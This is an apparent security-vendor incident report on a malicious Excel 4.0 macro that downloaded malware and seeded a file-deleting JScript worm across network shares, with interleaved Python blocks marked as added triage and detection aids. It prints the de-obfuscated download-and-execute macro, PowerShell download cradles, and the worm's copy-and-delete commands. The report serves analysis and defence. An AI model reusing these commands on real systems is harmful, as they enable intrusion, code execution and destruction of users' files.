Executive Summary

On March 24th, 2020, Rapid7’s Managed Detection and Response (MDR) identified the execution of a malicious document which downloaded malware onto Asset01. This malware was able to enumerate fileshares and attempted to spread itself to other assets in the ACME Anvil Co. environment. Rapid7 MDR identified three assets (Asset02, Asset03, and Asset04) that the malware successfully spread to before its spreading mechanism was stopped by ACME Anvil Co. staff. (Note: All user/host names, file paths, and any other customer-specific data have been altered or redacted.)

Direct any additional questions or concerns to the Customer Advisor:

If outside of normal business hours, contact the Customer Advisor or Rapid7’s 24/7 hotline:

Region 24/7 Hotline Number
United States (US) +1-844-867-5309
European Union (EU) +44-800-867-5309
Singapore (SG) +65-800-867-5309


Threat Summary

Category:
Asset Compromise
Type:
Malicious Document
Criticality:
Critical

Host Summary

Name:
Asset01
Asset02
Asset03
Asset04

User:
ACME/Account01
ACME/Account02
ACME/Account03
ACME/Account04

Alert Summary

Event Time:
2020-03-24 15:37:11 UTC
Alert Time:
2020-03-24 15:37:46 UTC
Acknowledge Time:
2020-03-24 15:55:37 UTC
Source:
InsightIDR
Validated:
Yes

Detailed Analysis

On 2020-03-24 at 15:29:41 UTC, user ACME\Account01 opened the email attachment notif2374.xls (MD5: c1049e9580998030aa9e22059b3ca9fd). Rapid7 MDR obtained and analyzed this Excel document. It contained a visual lure intended to trick the user into enabling active content:

If enabled, an XLM (Excel 4.0) macro stored in a hidden sheet within the spreadsheet would execute.

This macro would attempt to execute the following code (de-obfuscated):

IF(GET.WORKSPACE(13)<770,CLOSE(FALSE),)
IF(GET.WORKSPACE(14)<381,CLOSE(FALSE),)
IF(GET.WORKSPACE(19),,CLOSE(TRUE))
IF(GET.WORKSPACE(42),,CLOSE(TRUE))
IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))),CLOSE(TRUE))
CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"hXXps://grpxmqnrb[.]pw/ehrj4g9g","c:\Users\Public\gef3fff.html",0,0)
ALERT("TheworkbookcannotbeopenedorrepairedbyMicrosoftExcelbecauseit'scorrupt.",2)
CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","c:\Users\Public\gef3fff.html,DllRegisterServer",0,5)
CLOSE(FALSE)

The first two lines check whether the window displaying the file is smaller than 770x381 pixels and, if so, close the workbook without executing any further code. The third line checks whether a mouse is present, the fourth whether a sound card is installed in the operating system, and the fifth whether the operating system is Microsoft Windows. These checks are likely attempts to determine whether the spreadsheet has been opened in a sandbox for analysis.

If these conditions are met, the code attempts to download a DLL from hXXps://grpxmqnrb[.]pw/ehrj4g9g (8.208.28[.]247) and save it to c:\Users\Public\gef3fff.html, while displaying a notification to the user containing the following text: “TheworkbookcannotbeopenedorrepairedbyMicrosoftExcelbecauseit’scorrupt.”

Afterward, it attempts to execute the “DllRegisterServer” export of the downloaded DLL via rundll32.exe.
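As an added triage aid (not part of the report or its tooling), the following Python parses de-obfuscated XLM macro lines like the ones above: it records which GET.WORKSPACE environment probes the macro makes, and pulls the download URL, drop path and execution target out of the urlmon and Shell32 CALLs so an analyst can confirm the chain the report describes. The sample input is the report’s own de-obfuscated macro, left defanged; the probe meanings are the standard Excel 4.0 GET.WORKSPACE type_num definitions, and the CALL argument positions follow the "JJCCJJ"/"JJCCCJJ" type strings shown.

```python
import re

# Constructed sample: the report's de-obfuscated macro, URL left defanged as printed.
SAMPLE_MACRO = [
    'IF(GET.WORKSPACE(13)<770,CLOSE(FALSE),)',
    'IF(GET.WORKSPACE(14)<381,CLOSE(FALSE),)',
    'IF(GET.WORKSPACE(19),,CLOSE(TRUE))',
    'IF(GET.WORKSPACE(42),,CLOSE(TRUE))',
    'IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))),CLOSE(TRUE))',
    'CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"hXXps://grpxmqnrb[.]pw/ehrj4g9g","c:\\Users\\Public\\gef3fff.html",0,0)',
    "ALERT(\"TheworkbookcannotbeopenedorrepairedbyMicrosoftExcelbecauseit'scorrupt.\",2)",
    'CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\\Windows\\system32\\rundll32.exe","c:\\Users\\Public\\gef3fff.html,DllRegisterServer",0,5)',
    'CLOSE(FALSE)',
]

# Standard Excel 4.0 GET.WORKSPACE type_num meanings for the probes seen in this macro.
WORKSPACE_PROBES = {
    1: "environment name (operating system)",
    13: "usable workspace width in points",
    14: "usable workspace height in points",
    19: "mouse present",
    42: "sound capability present",
}

WORKSPACE_RE = re.compile(r'GET\.WORKSPACE\((\d+)\)')
CALL_RE = re.compile(r'CALL\((.*)\)$')


def split_args(argstr):
    """Split an XLM argument list on commas that are outside double quotes."""
    args, cur, in_str = [], '', False
    for ch in argstr:
        if ch == '"':
            in_str = not in_str
            cur += ch
        elif ch == ',' and not in_str:
            args.append(cur)
            cur = ''
        else:
            cur += ch
    args.append(cur)
    return [a.strip().strip('"') for a in args]


def triage_xlm(lines):
    """Return the environment probes, downloads and executions found in macro lines."""
    findings = {"environment_checks": [], "downloads": [], "executions": [], "other_calls": []}
    for line in lines:
        for m in WORKSPACE_RE.finditer(line):
            n = int(m.group(1))
            findings["environment_checks"].append((n, WORKSPACE_PROBES.get(n, "unknown type_num")))
        m = CALL_RE.search(line)
        if not m:
            continue
        args = split_args(m.group(1))
        if len(args) < 3:
            continue
        module, func = args[0].lower(), args[1]
        if module == "urlmon" and func == "URLDownloadToFileA" and len(args) >= 6:
            # "JJCCJJ": caller, url, file, reserved, callback -> url is args[4], file is args[5]
            findings["downloads"].append({"url": args[4], "path": args[5]})
        elif module == "shell32" and func == "ShellExecuteA" and len(args) >= 7:
            # "JJCCCJJ": hwnd, verb, file, params, dir, show -> verb args[4], file args[5], params args[6]
            findings["executions"].append({"verb": args[4], "file": args[5], "params": args[6]})
        else:
            findings["other_calls"].append(f"{module}!{func}")
    return findings


def flags(findings):
    """Derive the analyst-facing verdicts the report draws from this macro."""
    out = []
    if len(findings["environment_checks"]) >= 3:
        out.append("sandbox-evasion: multiple GET.WORKSPACE environment probes")
    dropped = {d["path"].lower() for d in findings["downloads"]}
    for ex in findings["executions"]:
        if "rundll32" in ex["file"].lower():
            module = ex["params"].split(",")[0].strip().lower()
            if module in dropped and not module.endswith(".dll"):
                out.append(f"proxy-execution: rundll32 loads downloaded payload with non-DLL extension ({module})")
    return out


if __name__ == "__main__":
    result = triage_xlm(SAMPLE_MACRO)
    for key, value in result.items():
        print(key, value)
    print(flags(result))
```

The two verdicts `flags()` produces correspond to the report’s own reading: the run of GET.WORKSPACE probes is sandbox evasion, and rundll32 being pointed at a freshly downloaded file with an .html extension is the proxy-execution step that the Asset01 process logs later confirm.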

Evidence of this activity can be observed in process logs on Asset01:

"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" C:\Users\account01\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\U9PKY2Y6\notif2374.xls
C:\Windows\SysWOW64\rundll32.exe c:\Users\Public\gef3fff.html,DllRegisterServer

Rapid7 MDR was unable to obtain this DLL for analysis.

Rapid7 MDR identified records of DNS queries for grpxmqnrb[.]pw originating from Asset01. After these entries, Rapid7 MDR also identified DNS queries from the same host for wgyvjbse[.]pw and botiq[.]xyz. Both of these domains are suspected to be associated with this attacker’s infrastructure.

DNS Evidence

Rapid7 identified the following DNS lookups that are malicious in nature.

Table - DNS lookups found in InsightIDR

After this activity, rundll32.exe spawned msiexec.exe as a child process, which was used to enumerate information about the local host and its network:

cmd.exe /c net view /all
net view /all
cmd.exe /c ipconfig /all
cmd.exe /c net view /all
net view /all

Approximately 3 hours after initial infection, the attacker ran a malicious executable fk.exe (MD5: f51d7d54c34f0dbe620c00e8eb7dbca8):

C:\Users\account01\AppData\Local\Temp\fk.exe
cmd /c time /T && fcktv.jse && type fcktv.txt
C:\Windows\System32\WScript.exe C:\Users\account01\AppData\Local\Temp\IXP000.TMP\fcktv.jse

This executable extracts a malicious JavaScript file, fcktv.jse, and executes it.

The JavaScript copies itself into the user’s “AppData” folder and executes itself from there:

C:\Windows\System32\wscript.exe /B /E:JScript C:\Users\account01\AppData\Local\Temp\32b63f6b.kert 0

Note: wscript.exe is a legitimate Microsoft utility that interprets script files and executes their contents. In this instance it is being used to execute a malicious script.

This JavaScript file closely resembles an Ostap payload that Rapid7 MDR previously analyzed in the blog post at https://blog.rapid7.com/2019/11/14/we-dont-want-white-font-office-macros-evasion-and-malicious-self-reference/; however, this code has some slight variations in its execution. The JavaScript was heavily obfuscated; a sample of the partially de-obfuscated code is below:

This script would attempt to enumerate all files on all mapped drives with the following file extensions:

.odc
.odb
.wps
.xlk
.ppt
.pst
.dwg
.dxf
.dxg
.wpd
.doc
.xls
.pdf
.rtf
.txt
.pub
.mpp
.vsdx
.odt
.ods
.odp
.odm

After enumerating these files, it would create, alongside each one, a file with the same name and a .jse extension containing the JavaScript code, which would then be executed by any user who clicked on it. The code would then delete the original files from the shared drive.
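Because the script plants one identical payload under many document names, the share itself records the damage: a cluster of byte-identical .jse files with unrelated names, each standing where a deleted document used to be. The following Python, added here as a recovery aid and not part of the report, surveys a share root, clusters .jse files by SHA-256, treats any cluster of several identical copies as the worm’s footprint, and turns it into the list of original stems the restoration team needs to pull from backup; it also counts documents with the targeted extensions that are still present. The share layout it builds is a constructed sample modelled on the file names quoted in this report.

```python
import hashlib
import tempfile
from collections import defaultdict
from pathlib import Path

# Extensions the report says the script enumerated and replaced on mapped drives.
TARGETED_EXTS = {".odc", ".odb", ".wps", ".xlk", ".ppt", ".pst", ".dwg", ".dxf", ".dxg",
                 ".wpd", ".doc", ".xls", ".pdf", ".rtf", ".txt", ".pub", ".mpp", ".vsdx",
                 ".odt", ".ods", ".odp", ".odm"}


def sha256_file(path, chunk=1 << 16):
    """Stream-hash a file so large shares can be surveyed without loading files whole."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def survey_share(root):
    """Hash every .jse under root and group the paths by content hash."""
    clusters = defaultdict(list)
    for p in Path(root).rglob("*.jse"):
        if p.is_file():
            clusters[sha256_file(p)].append(p)
    return clusters


def worm_clusters(clusters, min_copies=3):
    """Identical .jse content under several different names is the worm's footprint;
    a single hand-written .jse on a share does not meet the threshold."""
    return {h: sorted(paths) for h, paths in clusters.items() if len(paths) >= min_copies}


def restoration_list(paths):
    """The planted .jse keeps the original's stem; the original (with its real
    extension) was deleted, so the stem is what the backup team searches for."""
    return sorted(str(p.with_suffix("")) for p in paths)


def remaining_targets(root):
    """Documents of the targeted types still on the share (not yet replaced)."""
    return sorted(p for p in Path(root).rglob("*")
                  if p.is_file() and p.suffix.lower() in TARGETED_EXTS)


def build_sample_share():
    """Constructed sample share: four identical planted .jse files, one unrelated
    admin .jse, and two documents the worm never reached."""
    root = Path(tempfile.mkdtemp(prefix="share_"))
    (root / "Account Documents").mkdir()
    payload = b"// constructed stand-in for the worm's JScript body\n"
    for name in ["Client Analysis.jse", "Client Analysis2.jse",
                 "Account Documents/Account Business Review February 2019.jse",
                 "Account Documents/File.jse"]:
        (root / name).write_bytes(payload)
    (root / "login-helper.jse").write_bytes(b"WScript.Echo('constructed legitimate admin script');\n")
    (root / "Untouched.pdf").write_bytes(b"%PDF-1.4 constructed\n")
    (root / "Account Documents" / "Budget.xls").write_bytes(b"constructed spreadsheet\n")
    return root


if __name__ == "__main__":
    share = build_sample_share()
    for digest, paths in worm_clusters(survey_share(share)).items():
        print(f"planted payload {digest[:16]}... in {len(paths)} places; restore:")
        for stem in restoration_list(paths):
            print("  ", stem)
    print("targeted documents still present:", len(remaining_targets(share)))
```

Running the cluster hash against the hash of the sample recovered from an endpoint (here the `.kert` copy in the user’s Temp folder) ties the share artefacts to the host infection; the `min_copies` threshold is what keeps a lone legitimate .jse from being swept into the restoration list.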

Rapid7 MDR observed the execution of this functionality via Process Start data from Asset01:

C:\Windows\System32\cmd.exe /U /Q /C cd /D G: && dir /b/s/x *.odc *.odb *.wps *.xlk *.ppt *.pst *.dwg *.dxf *.dxg *.wpd *.doc *.xls *.pdf *.rtf *.txt *.pub *.mpp *.vsdx *.odt *.ods *.odp *.odm>>%TEMP%\edcs.txt
C:\Windows\System32\cmd.exe /U /Q /C cd /D K: && dir /b/s/x *.odc *.odb *.wps *.xlk *.ppt *.pst *.dwg *.dxf *.dxg *.wpd *.doc *.xls *.pdf *.rtf *.txt *.pub *.mpp *.vsdx *.odt *.ods *.odp *.odm>>%TEMP%\edcs.txt
C:\Windows\System32\cmd.exe /T:49297 /U /Q /C copy /Y C:\Users\account01\AppData\Local\Temp\32b63f6b.kert "G:\Client Analysis.jse" && del /Q /F "G:\Client Analysis.xls"
C:\Windows\System32\cmd.exe /T:49297 /U /Q /C copy /Y C:\Users\account01\AppData\Local\Temp\32b63f6b.kert "G:\Client Analysis2.jse" && del /Q /F "G:\Client Analysis2.xls"
C:\Windows\System32\cmd.exe /T:49297 /U /Q /C copy /Y C:\Users\account01\AppData\Local\Temp\32b63f6b.kert "G:\Account Documents\Account Business Review February 2019.jse" && del /Q /F "G:\Account Documents\Account Business Review February 2019.pptx"
\??\C:\windows\system32\conhost.exe 0x4
C:\Windows\System32\cmd.exe /T:49297 /U /Q /C copy /Y C:\Users\account01\AppData\Local\Temp\32b63f6b.kert "G:\Account Documents\Technology Interface Training Deck (003).jse" && del /Q /F "G:\Account Documents\Technology Interface Training Deck (003).pptx"
\??\C:\windows\system32\conhost.exe 0x4
C:\Windows\System32\cmd.exe /T:49297 /U /Q /C copy /Y C:\Users\account01\AppData\Local\Temp\32b63f6b.kert "G:\Account Documents\File.jse" && del /Q /F "G:\Account Documents\File.pst"
[-- truncated for brevity --]

This script is also capable of reaching out to hXXps://185.216.35[.]18/5YGJuk/SVmP9W.php and receiving commands to execute or executables to run.

This code appears to have been used to enumerate information about users on the local domain, the compromised user account, and the accessibility of assets on the network:

C:\windows\system32\cmd.exe /C net users /domain
C:\windows\system32\net1 user ACME\Account01 /domain

After this, the code executed commands to enumerate assets on the local network and the permissions the compromised user account ACME\Account01 had to those assets.

powershell -nop -exec bypass IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:44420/'); Find-LocalAdminAccess -Threads 64
powershell -nop -exec bypass IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:6040/'); Get-NetComputer | %{Resolve-IPAddress -ComputerName $_.dnshostname} | ft -auto
powershell -nop -exec bypass IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:13023/'); nslookup -q=srv _kerberos._tcp
powershell -nop -exec bypass IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:42285/'); nslookup -q=srv _kerberos._tcp
ping AssetXXX
ping AssetXXY
ping AssetXXZ
ping AssetXYY
ping AssetXYZ
ping AssetYYY
ping AssetYYZ
ping AssetYXZ

Lastly, the attacker attempted to enumerate subnet information about the domain; however, by the time this process executed the asset had already been quarantined:

powershell -nop -exec bypass IEX (New-Object Net.Webclient).DownloadString('hXXp://127.0.0[.]1:21409/'); [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest().Sites.Subnets

Rapid7 MDR identified three assets that executed the malicious JavaScript code from a network share and were infected:

Asset: Asset02
User: ACME/Account02
Command Execution: C:\Windows\System32\WScript.exe "G:\Supplementary Documents\Client_VM Log\Comprehensive VM Log March 2020.jse"

Asset: Asset03
User: ACME/Account03
Command Execution: C:\Windows\System32\WScript.exe "G:\Supplementary Documents\Client_VM Log\Comprehensive VM Log April 2020.jse"

Asset: Asset04
User: ACME/Account04
Command Execution: C:\Windows\System32\WScript.exe "G:\Supplementary Documents\Client_VM Log\Comprehensive VM Log MASTER.jse"

Assets Asset03 and Asset04 were taken offline before they had a chance to spread.

On asset Asset02, the code was able to execute and began attempting to copy itself to the network drives mapped by user account ACME/Account02:

C:\Windows\System32\wscript.exe /B /E:JScript C:\Users\Account02\AppData\Local\Temp\d94309c6.kert 0
C:\WINDOWS\SysWOW64\DllHost.exe /Processid:{53362C32-A296-4F2D-A2F8-FD984D08340B}
C:\WINDOWS\SysWOW64\SearchProtocolHost.exe Global\UsGthrFltPipeMssGthrPipe_S-1-5-21-551553347-692472059-1844936127-19920151_ Global\UsGthrCtrlFltPipeMssGthrPipe_S-1-5-21-551553347-692472059-1844936127-19920151 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc DownLevelDaemon 1
C:\WINDOWS\SysWOW64\DllHost.exe /Processid:{53362C32-A296-4F2D-A2F8-FD984D08340B}
C:\Users\Account02\AppData\Local\Temp\d94309c6.Swan_1262.cmd 1262
C:\Windows\System32\cmd.exe /U /Q /C cd /D H: && dir /b/s/x *.odc *.odb *.wps *.xlk *.ppt *.pst *.dwg *.dxf *.dxg *.wpd *.doc *.xls *.pdf *.rtf *.txt *.pub *.mpp *.vsdx *.odt *.ods *.odp *.odm>>%TEMP%\edcs.txt
\??\C:\WINDOWS\system32\conhost.exe 0x4
C:\Windows\System32\cmd.exe /U /Q /C cd /D K: && dir /b/s/x *.odc *.odb *.wps *.xlk *.ppt *.pst *.dwg *.dxf *.dxg *.wpd *.doc *.xls *.pdf *.rtf *.txt *.pub *.mpp *.vsdx *.odt *.ods *.odp *.odm>>%TEMP%\edcs.txt
\??\C:\WINDOWS\system32\conhost.exe 0x4
C:\WINDOWS\SysWOW64\DllHost.exe /Processid:{53362C32-A296-4F2D-A2F8-FD984D08340B}
C:\Windows\System32\cmd.exe /U /Q /C cd /D L: && dir /b/s/x *.odc *.odb *.wps *.xlk *.ppt *.pst *.dwg *.dxf *.dxg *.wpd *.doc *.xls *.pdf *.rtf *.txt *.pub *.mpp *.vsdx *.odt *.ods *.odp *.odm>>%TEMP%\edcs.txt
\??\C:\WINDOWS\system32\conhost.exe 0x4
C:\WINDOWS\system32\WerFault.exe -u -p 13996 -s 1320
C:\WINDOWS\SysWOW64\DllHost.exe /Processid:{53362C32-A296-4F2D-A2F8-FD984D08340B}
C:\WINDOWS\system32\BackgroundTaskHost.exe -ServerName:BackgroundTaskHost.WebAccountProvider
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\cmd.exe /T:1262 /U /Q /C copy /Y C:\Users\Account02\AppData\Local\Temp\d94309c6.kert "H:\SOP 9.jse" && del /Q /F "H:\SOP 9.13.19.pdf"
\??\C:\WINDOWS\system32\conhost.exe 0x4
C:\Windows\System32\cmd.exe /T:1262 /U /Q /C copy /Y C:\Users\Account02\AppData\Local\Temp\d94309c6.kert "H:\Escalation Procedure 9.jse" && del /Q /F "H:\Escalation Procedure 9.5.19.pdf"
\??\C:\WINDOWS\system32\conhost.exe 0x4
C:\Windows\System32\cmd.exe /T:1262 /U /Q /C copy /Y C:\Users\Account02\AppData\Local\Temp\d94309c6.kert "H:\Progress Report.jse" && del /Q /F "H:\Progress Report.pdf"
\??\C:\WINDOWS\system32\conhost.exe 0x4
C:\Windows\System32\cmd.exe /T:1262 /U /Q /C copy /Y C:\Users\Account02\AppData\Local\Temp\d94309c6.kert "H:\Standard Formats.jse" && del /Q /F "H:\Standard Formats.pdf"
\??\C:\WINDOWS\system32\conhost.exe 0x4
C:\Windows\System32\cmd.exe /T:1262 /U /Q /C copy /Y C:\Users\Account02\AppData\Local\Temp\d94309c6.kert "H:\Product Inventory_1-08-20.jse" && del /Q /F "H:\Product Inventory_1-08-20.pdf"
[-- truncated for brevity --]

Process Start logs indicate the attacker was able to spread this malware to ACME/Account02’s “H:” and “K:” drives but the asset was taken offline before it could reach the “L:” drive.
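The Process Start lines quoted throughout this report carry the whole chain in their command lines alone: rundll32 loading a module with a non-DLL extension, wscript forced onto a file with a bogus extension through /E:JScript, a cmd copy of the payload to a .jse name chained with del of the original, and a PowerShell download cradle pointed at a loopback stager. The following Python, added here as a detection illustration and not from the report or InsightIDR, runs those four rules over constructed sample lines modelled on the report’s (the redacted names are the report’s; the last two lines are benign controls added for contrast). It works on the command line only, so it does not need parent-process data.

```python
import ntpath
import re

# Constructed sample Process Start command lines, modelled on the report's; the
# last two are benign controls that the rules must not flag.
SAMPLE_PROCESS_STARTS = [
    r'C:\Windows\SysWOW64\rundll32.exe c:\Users\Public\gef3fff.html,DllRegisterServer',
    r'C:\Windows\System32\wscript.exe /B /E:JScript C:\Users\account01\AppData\Local\Temp\32b63f6b.kert 0',
    r'C:\Windows\System32\cmd.exe /T:49297 /U /Q /C copy /Y C:\Users\account01\AppData\Local\Temp\32b63f6b.kert "G:\Client Analysis.jse" && del /Q /F "G:\Client Analysis.xls"',
    r"powershell -nop -exec bypass IEX (New-Object Net.Webclient).DownloadString('http://127.0.0.1:44420/'); Find-LocalAdminAccess -Threads 64",
    r'C:\Windows\System32\rundll32.exe shell32.dll,Control_RunDLL',
    r'C:\Windows\System32\cmd.exe /c copy /Y "G:\Report.xlsx" "G:\Archive\Report.xlsx"',
]

# Extensions rundll32 legitimately loads, and extensions script hosts legitimately run.
LOADABLE_EXTS = {".dll", ".cpl", ".ocx", ".ax", ".drv", ""}
SCRIPT_EXTS = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh"}

RUNDLL32_RE = re.compile(r'rundll32\.exe\s+"?([^",]+?)"?\s*,', re.I)
SCRIPT_HOST_RE = re.compile(r'[wc]script\.exe\b.*?/E:(\w+)\s+"?([^"\s]+)', re.I)
SHARE_OVERWRITE_RE = re.compile(
    r'copy\s+/Y\s+(?P<src>"[^"]+"|\S+)\s+(?P<dst>"[^"]+"|\S+)\s*&&\s*del\b.*?(?P<victim>"[^"]+"|\S+)\s*$',
    re.I)
PS_STAGER_RE = re.compile(
    r"powershell\b.*?(-exec\w*\s+bypass|-ep\s+bypass).*?DownloadString\('([^']+)'\)", re.I)


def unquote(s):
    return s.strip().strip('"')


def detect_line(cmdline):
    """Apply the four command-line rules to one Process Start record."""
    hits = []
    m = RUNDLL32_RE.search(cmdline)
    if m:
        module = unquote(m.group(1))
        if ntpath.splitext(module)[1].lower() not in LOADABLE_EXTS:
            hits.append({"rule": "rundll32_non_dll_module", "detail": module})
    m = SCRIPT_HOST_RE.search(cmdline)
    if m:
        engine, script = m.group(1), unquote(m.group(2))
        if ntpath.splitext(script)[1].lower() not in SCRIPT_EXTS:
            hits.append({"rule": "script_host_engine_override", "detail": f"{engine} forced on {script}"})
    m = SHARE_OVERWRITE_RE.search(cmdline)
    if m:
        dst, victim = unquote(m.group("dst")), unquote(m.group("victim"))
        if ntpath.splitext(dst)[1].lower() == ".jse":
            hits.append({"rule": "share_file_replaced_with_jse", "detail": f"{victim} -> {dst}"})
    m = PS_STAGER_RE.search(cmdline)
    if m:
        url = m.group(2)
        local = url.lower().startswith(("http://127.", "http://localhost"))
        hits.append({"rule": "powershell_download_cradle",
                     "detail": url + (" (loopback: local stager)" if local else "")})
    return hits


def triage(lines):
    """Run every rule over every line; return (line_index, hit) pairs for review."""
    return [(i, hit) for i, line in enumerate(lines) for hit in detect_line(line)]


if __name__ == "__main__":
    for idx, hit in triage(SAMPLE_PROCESS_STARTS):
        print(f"line {idx}: {hit['rule']}: {hit['detail']}")
```

The share-overwrite rule deliberately records the deleted file name rather than trying to infer it from the .jse stem, because the report’s Asset02 lines show the stem being cut at the first dot (“SOP 9.13.19.pdf” became “SOP 9.jse”), so the del argument is the only reliable record of what was lost.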

Firewall logs for all assets identified as compromised in this investigation did not contain entries for connections to external address space. This suggests that the users were either on split-tunnel VPN connections at the time of the investigation or that there is a visibility gap in firewall logging. As such, connections to malicious infrastructure could not be confirmed via firewall logs.

After this activity, ACME Anvil Co. staff took proactive action and removed user access to shared drives and began restoring files from backup.

Relevant Investigations

Rapid7 identified the following InsightIDR investigations related to the activity in this incident report.

Table - Relevant Investigations From InsightIDR

Process Evidence

Rapid7 identified the following processes that are malicious in nature.

Table - Processes Captured By InsightAgent

Indicators Of Compromise

Rapid7 identified the following Indicators of Compromise (IOC) that are related to malicious actor activity.

Table - Indicators Of Compromise

Remediation Recommendations

This section provides the following remediation recommendations to contain the threat:

Priority | LOE | Recommendation
High | Moderate | Rebuild Affected Systems from a Known-Good Baseline Image
Rebuild systems from a known-good baseline image to counter undetected threats. Manually removing malware or scanning with an updated antivirus solution may not fully restore the integrity of the system.
High | Low | Block Malicious Domains
Block the identified malicious domains at all appropriate network filtering and Domain Name Server devices, such as firewalls, web proxies, and DNS servers.
High | Low | Block Malicious IP Addresses
Block the identified malicious IP addresses at all appropriate network filtering devices, such as firewalls, web proxies, routers, and switches.
High | Low | Quarantine Network Traffic from Affected Endpoints
Immediately quarantine the affected endpoints from the network. InsightConnect could be used to perform these actions, which can be accessed through the ‘Take Action’ button at relevant investigations.
High | Low | Lock the Affected Accounts
Lock the affected accounts until their credentials are rotated. InsightConnect could be used to perform these actions, which can be accessed through the ‘Take Action’ button at relevant investigations.
High | Low | Change Passwords for Affected Accounts
Change the affected account passwords as soon as possible to prevent a malicious actor from leveraging the credentials to access services. Instruct users to not just change one character of a password, such as changing Example1! to Example2!. A malicious actor who has captured past credentials could be more successful in guessing credentials changed by only one character. InsightConnect could be used to perform these actions, which can be accessed through the ‘Take Action’ button at relevant investigations.
High | Medium | Restore Fileshare Data from Backup
During the period the attacker was active on the network, they were able to spread malware via files on network fileshares. Rapid7 recommends restoring those drives from backup to ensure complete removal of all malware artifacts and to restore all data.

Mitigation Recommendations

This section provides the following mitigation recommendations to prevent this threat from occurring in the future:

Priority | LOE | Recommendation
High | Moderate | Update Frequently Targeted Applications
Update frequently targeted applications, such as the Microsoft Office suite, Adobe Flash, Adobe Acrobat, and Internet browsers to reduce the likelihood of compromise from exploit kits, phishing, and targeted attacks.
Moderate | Low | Prevent Execution of Office Macros via Group Policy
Disable macro execution in the Microsoft Office suite from untrusted locations. Office macros account for approximately 98% of Office malware. Disabling macros decreases the attack surface of user workstations. For more information on disabling macros using AD GPOs click here.
Moderate | Low | Prevent Activation of OLE Packages in Word Documents
Prevent the activation of OLE packages in Microsoft Word to prevent users from launching malicious packages. Create a registry value at ‘HKCU<Office Version>' with the name ‘PackagerPrompt’, of type ‘REG_DWORD’ and value ‘2’. For more information, see the articles provided here and here.
High | Low | Implement User Awareness Training
Implement phishing-based training for users identified as opening unknown attachments or clicking unknown links. Train users on how to forward suspicious links to security for analysis.
Moderate | Moderate | Disable Split-Tunnel VPN Configurations
Ensure that all VPN users have their entire network traffic tunneled through the VPN to reduce the risk of a malicious actor connecting to the endpoint. Split-tunnel VPNs allow connections from a remotely connected endpoint to traverse a potentially untrusted network.
Moderate | Moderate | Harden Systems Based on Industry Guidelines
Follow vendor-recommended guidelines for security settings on Windows platforms provided here and here.

Appendix A: Criticality Matrix

Criticality Matrix

Rapid7 assesses the criticality of findings based on malicious actor intent and sample capability. By combining malicious actor threat intelligence and knowledge of attack tools, Rapid7 determines the overall risk and potential impact of each finding and delivers that context to MDR clients.

Threat Intent And Capability

Intent

The purpose or motivation driving malicious actions, including distributing spam to generate revenue, breaching an organization to capture intellectual property, or leaking privileged information to damage an organization’s public reputation.

Capability

The features inherent to malicious tools or compromised accounts. The capability of a utility such as a port scanner is low, as it is a single-purpose utility incapable of executing remote commands or exploiting systems. The capabilities of a remote access Trojan are moderate, as it allows for remote code execution and remote system interaction.

Threat Criticality

Critical Risk

A malicious actor’s intent is to tailor malware, Command and Control servers, and ingress methods to a specific target or organization. The malware is custom made, often modular, and is capable of remote code execution, credential harvesting, remote access, and file download and upload. These can carry a unique campaign code for the organization in malware beacons, and may be deployed by spear phishing, social engineering, zero-day exploitation, or strategic web compromise.

High Risk

A malicious actor’s intent is to target a specific resource by reusing well-known malware after successfully compromising a system. The malware is capable of remote code execution and remote desktop interaction, and includes targeted COTS backdoors deployed through spear phishing, social engineering, or strategic web compromise.

Moderate Risk

A malicious actor’s intent is to harvest third-party credentials using at-scale financial fraud or perpetuating malware infections for banking services, cloud services, and email. These compromises are opportunistic and automatic. Malware may be capable of executing additional malware, but with limited data theft.

Low Risk

A malicious actor’s intent is to indiscriminately distribute revenue-generating applications to users, such as spam email. Adware and potentially unwanted programs (PUP) are not capable of remote code execution, credential harvesting, or data theft.